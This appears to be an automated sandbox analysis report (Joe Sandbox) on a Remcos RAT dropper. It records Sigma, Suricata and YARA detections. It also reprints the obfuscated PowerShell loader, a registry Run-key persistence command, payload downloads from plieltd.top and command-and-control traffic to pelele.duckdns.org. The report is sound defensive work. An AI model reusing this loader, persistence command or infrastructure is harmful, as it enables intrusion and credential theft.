REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", ProcessId: 2596, ProcessName: reg.exe
                Sigma detected: Msiexec Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.155.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7104, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", ProcessId: 7084, ProcessName: cmd.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , ProcessId: 4324, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTS

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7104, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T08:34:49.174652+020020365941Malware Command and Control Activity Detected192.168.2.449738185.236.203.10151525TCP
                2024-10-21T08:34:51.151958+020020365941Malware Command and Control Activity Detected192.168.2.449739185.236.203.10151525TCP
                2024-10-21T08:34:56.948809+020020365941Malware Command and Control Activity Detected192.168.2.449741185.236.203.10151525TCP
                2024-10-21T08:34:56.968527+020020365941Malware Command and Control Activity Detected192.168.2.449742185.236.203.10151525TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T08:34:51.998973+020028033043Unknown Traffic192.168.2.449740178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T08:34:38.838096+020028032702Potentially Bad Traffic192.168.2.449737172.67.155.139443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: rIMG465244247443GULFORDEROpmagasinering.cmdVirustotal: Detection: 23%Perma Link
                Source: rIMG465244247443GULFORDEROpmagasinering.cmdReversingLabs: Detection: 18%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2000694205.0000000008910000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: msiexec.exe, 0000000E.00000002.2241394427.0000000002857000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*3 source: msiexec.exe, 0000000E.00000002.2241394427.000000000283A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xqm.Core.pdbol source: powershell.exe, 00000004.00000002.2000694205.0000000008910000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 185.236.203.101:51525
                Uses dynamic DNS services
                Source: unknownDNS query: name: pelele.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.4:49738 -> 185.236.203.101:51525
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 185.236.203.101 185.236.203.101
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 172.67.155.139:443
                Source: global trafficHTTP traffic detected: GET /Underbyggelse.aaf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /FevmSBTRsrPt160.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Underbyggelse.aaf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /FevmSBTRsrPt160.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000003.2244485781.0000000004991000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249304549.000000000499B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249145713.000000000499B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000003.2244485781.0000000004991000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249304549.000000000499B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249145713.000000000499B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: bhvF678.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhvF678.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                Source: msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: plieltd.top
                Source: global trafficDNS traffic detected: DNS query: pelele.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: powershell.exe, 00000004.00000002.1996067162.0000000007B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microB
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, bhvF678.tmp.13.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpH
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpT
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpt
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpz
                Source: powershell.exe, 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocspx.digicert.com0E
                Source: powershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1787742509.0000012081D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://plieltd.top
                Source: powershell.exe, 00000002.00000002.1787742509.0000012080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1967209792.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhvF678.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225662972.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225640683.0000000002D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: msiexec.exe, 0000000F.00000003.2225662972.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225640683.0000000002D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
                Source: msiexec.exe, 00000009.00000003.2092467601.0000000009300000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2092557647.0000000009300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cw
                Source: bhvF678.tmp.13.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                Source: msiexec.exe, 0000000D.00000002.2249718163.0000000002B24000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhvF678.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                Source: bhvF678.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                Source: bhvF678.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                Source: bhvF678.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                Source: bhvF678.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                Source: bhvF678.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                Source: bhvF678.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                Source: bhvF678.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                Source: bhvF678.tmp.13.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                Source: bhvF678.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                Source: bhvF678.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000002.00000002.1787742509.0000012080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.1967209792.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
                Source: bhvF678.tmp.13.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhvF678.tmp.13.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: bhvF678.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: bhvF678.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                Source: powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
